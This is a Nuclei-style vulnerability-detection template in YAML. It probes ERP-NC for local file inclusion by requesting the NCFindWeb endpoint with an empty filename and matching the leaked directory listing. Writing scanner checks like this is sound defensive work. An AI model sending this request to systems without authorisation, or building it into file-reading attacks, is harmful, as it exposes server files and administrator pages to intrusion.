38 lines
959 B
YAML
38 lines
959 B
YAML
id: erp-nc-directory-traversal
|
|
|
|
info:
|
|
name: ERP-NC - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: ERP-NC is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: lfi,erp-nc
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Client"
|
|
- "ncwslogin.jsp"
|
|
- "admin.jsp"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022043c7901006107d07a9f9cb48de304325781e0992ecb6657ce187e6b0fe3fe588022100cf6eeddfc0793e9eaa4650dba07c4587f7d16b622c2a19f59135513f5df90f5e:922c64590222798bb761d5b6d8e72950
|